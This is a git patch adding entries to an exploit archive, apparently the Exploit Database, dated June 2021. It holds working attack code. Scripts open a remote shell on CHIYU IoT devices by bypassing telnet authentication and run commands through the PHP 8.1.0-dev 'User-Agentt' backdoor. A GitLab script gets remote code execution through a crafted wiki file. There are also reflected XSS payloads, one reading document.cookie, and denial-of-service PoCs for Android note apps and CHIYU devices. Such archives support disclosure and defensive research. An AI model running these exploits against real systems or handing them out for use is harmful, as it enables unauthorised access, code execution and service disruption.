From a9fa314bbfcf3fd6b178434aabc9fe7c37207af2 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 4 Jun 2021 05:01:54 +0000 Subject: [PATCH] DB: 2021-06-04 14 changes to exploits/shellcodes BasicNote 1.1.9 - Denial of Service (PoC) ColorNote 4.1.9 - Denial of Service (PoC) Notepad notes 2.6.7 - Denial of Service (PoC) Blacknote 2.2.1 - Denial of Service (PoC) CHIYU IoT Devices - 'Telnet' Authentication Bypass PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution Seo Panel 4.8.0 - 'from_time' Reflected XSS CHIYU IoT Devices - Denial of Service (DoS) FUDForum 3.1.0 - 'srch' Reflected XSS FUDForum 3.1.0 - 'author' Reflected XSS Gitlab 13.9.3 - Remote Code Execution (Authenticated) 4Images 1.8 - 'redirect' Reflected XSS --- exploits/android/dos/49938.py | 35 +++++++++ exploits/android/dos/49939.py | 37 ++++++++++ exploits/android/dos/49940.py | 35 +++++++++ exploits/android/dos/49941.py | 35 +++++++++ exploits/hardware/remote/49936.py | 81 ++++++++++++++++++++ exploits/hardware/webapps/49937.txt | 47 ++++++++++++ exploits/multiple/webapps/49163.txt | 1 + exploits/multiple/webapps/49884.txt | 1 + exploits/php/webapps/49933.py | 53 ++++++++++++++ exploits/php/webapps/49935.txt | 19 +++++ exploits/php/webapps/49942.txt | 19 +++++ exploits/php/webapps/49943.txt | 19 +++++ exploits/php/webapps/49945.txt | 17 +++++ exploits/ruby/webapps/49944.py | 110 ++++++++++++++++++++++++++++ files_exploits.csv | 12 +++ 15 files changed, 521 insertions(+) create mode 100755 exploits/android/dos/49938.py create mode 100755 exploits/android/dos/49939.py create mode 100755 exploits/android/dos/49940.py create mode 100755 exploits/android/dos/49941.py create mode 100755 exploits/hardware/remote/49936.py create mode 100644 exploits/hardware/webapps/49937.txt create mode 100755 exploits/php/webapps/49933.py create mode 100644 exploits/php/webapps/49935.txt create mode 100644 exploits/php/webapps/49942.txt create mode 100644 exploits/php/webapps/49943.txt create mode 100644 exploits/php/webapps/49945.txt create mode 100755 exploits/ruby/webapps/49944.py diff --git a/exploits/android/dos/49938.py b/exploits/android/dos/49938.py new file mode 100755 index 000000000..7e96e468d --- /dev/null +++ b/exploits/android/dos/49938.py @@ -0,0 +1,35 @@ +# Exploit Title: BasicNote 1.1.9 - Denial of Service (PoC) +# Date: 2021-06-02 +# Author: Brian Rodríguez +# Download Link: https://play.google.com/store/apps/details?id=notizen.basic.notes.notas.note.notepad&hl=es_MX +# Version: 1.1.9 +# Category: DoS (Android) + +##### Vulnerability ##### + +BasicNote - Notas, Bloc de notas is vulnerable to a DoS condition when two long lists of characters are being used when creating a note: + +# STEPS # +# Open the program +# Create a new Note. +# Run the python exploit script payload.py, it will create a new payload.txt file +# Copy the content of the file "payload.txt" +# Paste the content from payload.txt twice in the new Note. +# Crashed + +Successful exploitation will causes application stop working. + +I have been able to test this exploit against Android 8.0. + +##### PoC ##### + +#!/usr/bin/env python +buffer = "\x41" * 350000 + +try: + f = open("payload.txt","w") + f.write(buffer) + f.close() + print ("File created") +except: + print ("File cannot be created") \ No newline at end of file diff --git a/exploits/android/dos/49939.py b/exploits/android/dos/49939.py new file mode 100755 index 000000000..a7a0a1582 --- /dev/null +++ b/exploits/android/dos/49939.py @@ -0,0 +1,37 @@ +# Exploit Title: ColorNote 4.1.9 - Denial of Service (PoC) +# Date: 2021-06-02 +# Author: Brian Rodríguez +# Download Link: https://play.google.com/store/apps/details?id=com.socialnmobile.dictapps.notepad.color.note&hl=es_MX +# Version: 4.1.9 +# Category: DoS (Android) + +##### Vulnerability ##### + +Color Note is vulnerable to a DoS condition when a long list of characters is being used. + +# STEPS # +# Open the program +# Create a new Note. +# Run the python exploit script payload.py, it will create a new payload.txt file +# Copy the content of the file "payload.txt" +# Paste the content from payload.txt in the new note. +# Click the "Return" button twice. +# Start clicking the screen. +# Crashed + +Successful exploitation will causes application stop working. + +I have been able to test this exploit against Android 8.0. + +##### PoC ##### +--> payload.py <-- +#!/usr/bin/env python +buffer = "\x41" * 350000 + +try: + f = open("payload.txt","w") + f.write(buffer) + f.close() + print ("File created") +except: + print ("File cannot be created") \ No newline at end of file diff --git a/exploits/android/dos/49940.py b/exploits/android/dos/49940.py new file mode 100755 index 000000000..91566e8a4 --- /dev/null +++ b/exploits/android/dos/49940.py @@ -0,0 +1,35 @@ +# Exploit Title: Notepad notes 2.6.7 - Denial of Service (PoC) +# Date: 2021-06-02 +# Author: Brian Rodríguez +# Download Link: https://play.google.com/store/apps/details?id=com.hlcsdev.x.notepad&hl=es_MX +# Version: 2.6.7 +# Category: DoS (Android) + +##### Vulnerability ##### + +Bloc de notas is vulnerable to a DoS condition when a long lists of characters is being used when creating a note: + +# STEPS # +# Open the program. +# Create a new Note. +# Run the python exploit script payload.py, it will create a new payload.txt file +# Copy the content of the file "payload.txt" +# Paste the content from payload.txt twice in the new Note. +# Crashed + +Successful exploitation will cause application to stop working. + +I have been able to test this exploit against Android 8.0. + +##### PoC ##### +--> payload.py <-- +#!/usr/bin/env python +buffer = "\x41" * 350000 + +try: + f = open("payload.txt","w") + f.write(buffer) + f.close() + print ("File created") +except: + print ("File cannot be created") \ No newline at end of file diff --git a/exploits/android/dos/49941.py b/exploits/android/dos/49941.py new file mode 100755 index 000000000..cee03c492 --- /dev/null +++ b/exploits/android/dos/49941.py @@ -0,0 +1,35 @@ +# Exploit Title: Blacknote 2.2.1 - Denial of Service (PoC) +# Date: 2021-06-02 +# Author: Brian Rodríguez +# Download Link: https://play.google.com/store/apps/details?id=notepad.note.notas.notes.notizen&hl=es_MX +# Version: 2.2.1 +# Category: DoS (Android) + +##### Vulnerability ##### + +BlackNote Bloc de notas is vulnerable to a DoS condition when a long list of characters is being used when creating a note: + +# STEPS # +# Open the program. +# Create a new Note. +# Run the python exploit script payload.py, it will create a new payload.txt file +# Copy the content of the file "payload.txt" +# Paste the content from payload.txt twice in the new Note. +# Crashed + +Successful exploitation will cause the application to stop working. + +I have been able to test this exploit against Android 8.0. + +##### PoC ##### +--> payload.py <-- +#!/usr/bin/env python +buffer = "\x41" * 350000 + +try: + f = open("payload.txt","w") + f.write(buffer) + f.close() + print ("File created") +except: + print ("File cannot be created") \ No newline at end of file diff --git a/exploits/hardware/remote/49936.py b/exploits/hardware/remote/49936.py new file mode 100755 index 000000000..514df2976 --- /dev/null +++ b/exploits/hardware/remote/49936.py @@ -0,0 +1,81 @@ +# Exploit Title: CHIYU IoT Devices - 'Telnet' Authentication Bypass +# Date: 01/06/2021 +# Exploit Author: sirpedrotavares +# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html +# Software Link: https://www.chiyu-tech.com/category-hardware.html +# Version: BF-430, BF-431, BF-450M, and SEMAC - all firmware versions < June 2021 +# Tested on: BF-430, BF-431, BF-450M, and SEMAC +# CVE: CVE-2021-31251 +# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks + +""" +Description: Several IoT devices from the CHIYU Technology firm are +vulnerable to a flaw that permits bypassing the telnet authentication +process due to an overflow during the negotiation of the telnet protocol. +Telnet authentication is bypassed by supplying a specially malformed +request, and an attacker may force the remote telnet server to believe that +the user has already authenticated. Several models are vulnerable, +including BF-430, BF-431, BF-450M, and SEMAC with the most recent firmware +versions. +CVE ID: CVE-2021-31251 +CVSS: Critical - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H +URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31251 +""" + +#!/usr/bin/env python3 + +# usage: python3 exploit.py IP + +import socket +import time +import sys + +HOST = sys.argv[1] +PORT = 23 + +socket.setdefaulttimeout(10) +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + +try: + connect = s.connect_ex((HOST, PORT)) + try: + print("[+] Try to connect...\n") + time.sleep(1) + s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18") + s.recv(1024).strip() + s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18") + s.recv(1024).strip() + s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18") + result = s.recv(1024).strip() + if result != b'\xff\xfe\x01': + s.send(b"\x09") + result = s.recv(1024).strip() + + if connect == 0 and "sername" not in str(result): + if b"\xff\xfe\x01" == result: + print("Connected! ;)\ntype: \"help\"\n\n") + while 1: + cmd = input("(CHIYU pwnShell:) $ ") + body = cmd+"\n" + s.send(body.encode('utf-8', 'ignore')) + result = s.recv(1024).decode('utf8', 'ignore') + + if not len(result): + print("[+] CHIYU device not available, try +again ... (terminating)") + s.close() + break + print(result.strip('CMD>')) + b = "\n" + s.send(b.encode('utf-8', 'ignore')) + result = s.recv(1024).decode() + print(result.strip('CMD>')) + except KeyboardInterrupt: + print("\n[+] ^C Received, closing connection") + s.close() + except EOFError: + print("\n[+] ^D Received, closing connection") + s.close() + +except socket.error: + print("[+] Unable to connect to CHIYU device.") \ No newline at end of file diff --git a/exploits/hardware/webapps/49937.txt b/exploits/hardware/webapps/49937.txt new file mode 100644 index 000000000..bd10c5390 --- /dev/null +++ b/exploits/hardware/webapps/49937.txt @@ -0,0 +1,47 @@ +# Exploit Title: CHIYU IoT Devices - Denial of Service (DoS) +# Date: 01/06/2021 +# Exploit Author: sirpedrotavares +# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html +# Software Link: https://www.chiyu-tech.com/category-hardware.html +# Version: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC - all firmware versions < June 2021 +# Tested on: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC +# CVE: CVE-2021-31642 +# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks + +Description: A denial of service condition exists after an integer overflow in several IoT devices from CHIYU Technology, including BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC. The vulnerability can be explored by sending an unexpected integer (> 32 bits) on the page parameter that will crash the web portal and making it unavailable until a reboot of the device. +CVE ID: CVE-2021-31642 +CVSS: Medium- CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H +URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31642 + +Affected parameter: page=Component: if.cgi +Payload: +if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000 + +====HTTP request====== +GET +/if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000 +HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) +Gecko/20100101 Firefox/87.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3 +Accept-Encoding: gzip, deflate +Authorization: Basic YWRtaW46YWRtaW4= +Connection: close +Referer: http://127.0.0.1/AccLog.htm +Cookie: fresh= +Upgrade-Insecure-Requests: 1 + + + +Steps to reproduce: + 1. Navigate to the vulnerable device + 2. Make a GET request to the CGI component (if.cgi) + 3. Append the payload at the end of the vulnerable parameter (page) + 4. Submit the request and observe payload execution + + + Mitigation: The latest version of the CHIYU firmware should be installed +to mitigate this vulnerability. \ No newline at end of file diff --git a/exploits/multiple/webapps/49163.txt b/exploits/multiple/webapps/49163.txt index a77aed857..54c55dbc7 100644 --- a/exploits/multiple/webapps/49163.txt +++ b/exploits/multiple/webapps/49163.txt @@ -5,6 +5,7 @@ # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lssems.zip # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 +# CVE: CVE-2021-3278 Step 1: Open the URL http://localhost:8080/lssems/admin/login.php Step 2: use payload Aditya' or 1=1# in user and password field diff --git a/exploits/multiple/webapps/49884.txt b/exploits/multiple/webapps/49884.txt index cb5a2b096..0823f6141 100644 --- a/exploits/multiple/webapps/49884.txt +++ b/exploits/multiple/webapps/49884.txt @@ -4,6 +4,7 @@ # Vendor Homepage: https://www.in4velocity.com/in4suite-erp.html # Version: In4Suite ERP 3.2.74.1370 # Tested on: Windows +# CVE: CVE-2021-27828 ----------------------------------------- diff --git a/exploits/php/webapps/49933.py b/exploits/php/webapps/49933.py new file mode 100755 index 000000000..8191a6386 --- /dev/null +++ b/exploits/php/webapps/49933.py @@ -0,0 +1,53 @@ +# Exploit Title: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution +# Date: 23 may 2021 +# Exploit Author: flast101 +# Vendor Homepage: https://www.php.net/ +# Software Link: +# - https://hub.docker.com/r/phpdaily/php +# - https://github.com/phpdaily/php +# Version: 8.1.0-dev +# Tested on: Ubuntu 20.04 +# References: +# - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a +# - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md + +""" +Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/ +Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/backdoor_php_8.1.0-dev.py +Contact: flast101.sec@gmail.com + +An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header. +The following exploit uses the backdoor to provide a pseudo shell ont the host. +""" + +#!/usr/bin/env python3 +import os +import re +import requests + +host = input("Enter the full host url:\n") +request = requests.Session() +response = request.get(host) + +if str(response) == '': + print("\nInteractive shell is opened on", host, "\nCan't acces tty; job crontol turned off.") + try: + while 1: + cmd = input("$ ") + headers = { + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", + "User-Agentt": "zerodiumsystem('" + cmd + "');" + } + response = request.get(host, headers = headers, allow_redirects = False) + current_page = response.text + stdout = current_page.split('',1) + text = print(stdout[0]) + except KeyboardInterrupt: + print("Exiting...") + exit + +else: + print("\r") + print(response) + print("Host is not available, aborting...") + exit \ No newline at end of file diff --git a/exploits/php/webapps/49935.txt b/exploits/php/webapps/49935.txt new file mode 100644 index 000000000..be85c5a7a --- /dev/null +++ b/exploits/php/webapps/49935.txt @@ -0,0 +1,19 @@ +# Exploit Title: Seo Panel 4.8.0 - 'from_time' Reflected XSS +# Date: 23-03-2021 +# Exploit Author: Piyush Patil +# Vendor Homepage: https://www.seopanel.org/ +# Version: Seo Panel 4.8.0 +# Tested on: Windows 10 and Kali +# CVE : CVE-2021-28420 + +-Description: +A cross-site scripting (XSS) issue in Seo Panel 4.8.0 allows remote +attackers to inject JavaScript via alerts.php and the "from_time" parameter. + +-Payload used: +x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22 + +-Steps to reproduce: +1- Login to SEO admin panel +2- Visit: http://localhost/alerts.php?alert_category=general&from_time=x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22&keyword=&to_time=2021-03-11 +3- Hover your mouse to "Period" field \ No newline at end of file diff --git a/exploits/php/webapps/49942.txt b/exploits/php/webapps/49942.txt new file mode 100644 index 000000000..aec188404 --- /dev/null +++ b/exploits/php/webapps/49942.txt @@ -0,0 +1,19 @@ +# Exploit Title: FUDForum 3.1.0 - 'srch' Reflected XSS +# Exploit Author: Piyush Patil +# Vendor Homepage: http://fudforum.org/ +# Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum_3.1.0.zip/download +# Version: FUDForum 3.1.0 +# Tested on: Windows 10 and Kali +# CVE : CVE-2021-27519 + +-Description: +A cross-site scripting (XSS) issue in FUDForum 3.1.0 allows remote attackers to inject JavaScript via index.php in the "srch" parameter. + + +-Payload used: +x" onmouseover=alert(1) x=" + +-Steps to reproduce: +1- goto https://localhost/fudforum/index.php?t=search& +2- In "forum search" option, paste XSS payload +3- Hover your mouse to "x" and XSS will get triggered \ No newline at end of file diff --git a/exploits/php/webapps/49943.txt b/exploits/php/webapps/49943.txt new file mode 100644 index 000000000..8f2f9fa2e --- /dev/null +++ b/exploits/php/webapps/49943.txt @@ -0,0 +1,19 @@ +# Exploit Title: FUDForum 3.1.0 - 'author' Reflected XSS +# Exploit Author: Piyush Patil +# Vendor Homepage: http://fudforum.org/ +# Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum_3.1.0.zip/download +# Version: FUDForum 3.1.0 +# Tested on: Windows 10 and Kali +# CVE : CVE-2021-27520 + +-Description: +A cross-site scripting (XSS) issue in FUDForum 3.1.0 allows remote attackers to inject JavaScript via index.php in the "author" parameter. + + +-Payload used: +y" onmouseover=alert(2) y=" + +-Steps to reproduce: +1- goto https://localhost/fudforum/index.php?t=search& +2- In the "Filter by User" search option, paste XSS payload +3- Hover your mouse to "y" and XSS will get triggered \ No newline at end of file diff --git a/exploits/php/webapps/49945.txt b/exploits/php/webapps/49945.txt new file mode 100644 index 000000000..fa1087e13 --- /dev/null +++ b/exploits/php/webapps/49945.txt @@ -0,0 +1,17 @@ +# Exploit Title: 4Images 1.8 - 'redirect' Reflected XSS +# Exploit Author: Piyush Patil +# Vendor Homepage: https://www.4homepages.de/ +# Software Link: https://www.4homepages.de/?download=4images1.8.zip&code=81da0c7b5208e172ea83d879634f51d6 +# Version: 4Images Gallery 1.8 +# Tested on: Windows 10 and Kali +# CVE : CVE-2021-27308 + +-Description: +A cross-site scripting (XSS) vulnerability in the admin login panel in 4images version 1.8 allows remote attackers to inject JavaScript via the "redirect" parameter. + + +-Steps to reproduce: +1- Goto 4images admin panel page (demo instance: https://localhost/4images/admin/index.php) +2- Enter the credentials , Turn on the intercept and click on "Login" +3- copy paste the XSS payload after redirect=./../admin/index.php%3Fsessionid=xxxxxPASTEPAYLOADHERE +4-Forward the request and you can see XSS is triggered. \ No newline at end of file diff --git a/exploits/ruby/webapps/49944.py b/exploits/ruby/webapps/49944.py new file mode 100755 index 000000000..d9aaeb1ca --- /dev/null +++ b/exploits/ruby/webapps/49944.py @@ -0,0 +1,110 @@ +# Exploit Title: Gitlab 13.9.3 - Remote Code Execution (Authenticated) +# Date: 02/06/2021 +# Exploit Author: enox +# Vendor Homepage: https://about.gitlab.com/ +# Software Link: https://gitlab.com/ +# Version: < 13.9.4 +# Tested On: Ubuntu 20.04 +# Environment: Gitlab 13.9.1 CE +# Credits: https://hackerone.com/reports/1125425 + +#!/usr/bin/python3 + +import requests +from bs4 import BeautifulSoup +import random +import os +import argparse + +parser = argparse.ArgumentParser(description='GitLab < 13.9.4 RCE') +parser.add_argument('-u', help='Username', required=True) +parser.add_argument('-p', help='Password', required=True) +parser.add_argument('-c', help='Command', required=True) +parser.add_argument('-t', help='URL (Eg: http://gitlab.example.com)', required=True) +args = parser.parse_args() + +username = args.u +password = args.p +gitlab_url = args.t +command = args.c + +session = requests.Session() + +# Authenticating +print("[1] Authenticating") +r = session.get(gitlab_url + "/users/sign_in") +soup = BeautifulSoup(r.text, features="lxml") +token = soup.findAll('meta')[16].get("content") + +login_form = { + "authenticity_token": token, + "user[login]": username, + "user[password]": password, + "user[remember_me]": "0" +} +r = session.post(f"{gitlab_url}/users/sign_in", data=login_form) + +if r.status_code != 200: + exit(f"Login Failed:{r.text}") +else: + print("Successfully Authenticated") + +# Creating Project +print("[2] Creating Project") +r = session.get(f"{gitlab_url}/projects/new") +soup = BeautifulSoup(r.text, features="lxml") + +project_token = soup.findAll('meta')[16].get("content") +project_token = project_token.replace("==", "%3D%3D") +project_token = project_token.replace("+", "%2B") +project_name = f'project{random.randrange(1, 10000)}' +cookies = {'sidebar_collapsed': 'false','event_filter': 'all','hide_auto_devops_implicitly_enabled_banner_1': 'false','_gitlab_session': session.cookies['_gitlab_session'],} + +payload=f"utf8=%E2%9C%93&authenticity_token={project_token}&project%5Bci_cd_only%5D=false&project%5Bname%5D={project_name}&project%5Bpath%5D={project_name}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=20" + +r = session.post(gitlab_url+'/projects', data=payload, cookies=cookies, verify=False) + +if "The change you requested was rejected." in r.text: + exit('Exploit failed, check input params') +else: + print("Successfully created project") + + +# Cloning Wiki and Writing Files +print("[3] Pushing files to the project wiki") +wiki_url = f'{gitlab_url}/{username}/{project_name}.wiki.git' +os.system(f"git clone {wiki_url} /tmp/project") + +f1 = open("/tmp/project/load1.rmd","w") +f1.write('{::options syntax_highlighter="rouge" syntax_highlighter_opts="{formatter: Redis, driver: ../get_process_mem\}" /}\n\n') +f1.write('~~~ ruby\n') +f1.write(' def what?\n') +f1.write(' 42\n') +f1.write(' end\n') +f1.write('~~~\n') +f1.close() + +f2 = open("/tmp/project/load2.rmd","w") +temp='{::options syntax_highlighter="rouge" syntax_highlighter_opts="{a: \'`'+command+'`\', formatter: GetProcessMem\}" /}\n\n' +f2.write(temp) +f2.write('~~~ ruby\n') +f2.write(' def what?\n') +f2.write(' 42\n') +f2.write(' end\n') +f2.write('~~~\n') +f2.close() + +# It will prompt for user and pass. Enter it. +os.system('cd /tmp/project && git add -A . && git commit -m "Commit69" && git push') + +print("Succesfully Pushed") + +# Cleaning Up +os.system('rm -rf /tmp/project') + +# Triggering RCE + +print("[4] Triggering RCE") +trigger_url=f"{gitlab_url}/{username}/{project_name}/-/wikis/load2" + +r = session.get(trigger_url, cookies=cookies, verify=False) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index f3bb35fe5..b72ed94b7 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6785,6 +6785,10 @@ id,file,description,date,author,type,platform,port 49898,exploits/windows/dos/49898.txt,"iDailyDiary 4.30 - Denial of Service (PoC)",2021-05-24,"Ismael Nava",dos,windows, 49906,exploits/windows/dos/49906.py,"RarmaRadio 2.72.8 - Denial of Service (PoC)",2021-05-26,"Ismael Nava",dos,windows, 49917,exploits/windows/dos/49917.py,"DupTerminator 1.4.5639.37199 - Denial of Service (PoC)",2021-06-01,"Brian Rodriguez",dos,windows, +49938,exploits/android/dos/49938.py,"BasicNote 1.1.9 - Denial of Service (PoC)",2021-06-03,"Brian Rodriguez",dos,android, +49939,exploits/android/dos/49939.py,"ColorNote 4.1.9 - Denial of Service (PoC)",2021-06-03,"Brian Rodriguez",dos,android, +49940,exploits/android/dos/49940.py,"Notepad notes 2.6.7 - Denial of Service (PoC)",2021-06-03,"Brian Rodriguez",dos,android, +49941,exploits/android/dos/49941.py,"Blacknote 2.2.1 - Denial of Service (PoC)",2021-06-03,"Brian Rodriguez",dos,android, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -18475,6 +18479,7 @@ id,file,description,date,author,type,platform,port 49815,exploits/linux/remote/49815.py,"GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution (2)",2021-04-30,liewehacksie,remote,linux, 49896,exploits/solaris/remote/49896.py,"Solaris SunSSH 11.0 x86 - libpam Remote Root (2)",2021-05-21,legend,remote,solaris, 49908,exploits/linux/remote/49908.py,"ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)",2021-05-26,Shellbr3ak,remote,linux, +49936,exploits/hardware/remote/49936.py,"CHIYU IoT Devices - 'Telnet' Authentication Bypass",2021-06-03,sirpedrotavares,remote,hardware, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -44095,3 +44100,10 @@ id,file,description,date,author,type,platform,port 49930,exploits/python/webapps/49930.txt,"Products.PluggableAuthService 2.6.0 - Open Redirect",2021-06-02,"Piyush Patil",webapps,python, 49931,exploits/php/webapps/49931.txt,"Seo Panel 4.8.0 - 'search_name' Reflected XSS",2021-06-02,"Piyush Patil",webapps,php, 49932,exploits/php/webapps/49932.txt,"Seo Panel 4.8.0 - 'category' Reflected XSS",2021-06-02,"Piyush Patil",webapps,php, +49933,exploits/php/webapps/49933.py,"PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution",2021-06-03,flast101,webapps,php, +49935,exploits/php/webapps/49935.txt,"Seo Panel 4.8.0 - 'from_time' Reflected XSS",2021-06-03,"Piyush Patil",webapps,php, +49937,exploits/hardware/webapps/49937.txt,"CHIYU IoT Devices - Denial of Service (DoS)",2021-06-03,sirpedrotavares,webapps,hardware, +49942,exploits/php/webapps/49942.txt,"FUDForum 3.1.0 - 'srch' Reflected XSS",2021-06-03,"Piyush Patil",webapps,php, +49943,exploits/php/webapps/49943.txt,"FUDForum 3.1.0 - 'author' Reflected XSS",2021-06-03,"Piyush Patil",webapps,php, +49944,exploits/ruby/webapps/49944.py,"Gitlab 13.9.3 - Remote Code Execution (Authenticated)",2021-06-03,enox,webapps,ruby, +49945,exploits/php/webapps/49945.txt,"4Images 1.8 - 'redirect' Reflected XSS",2021-06-03,"Piyush Patil",webapps,php,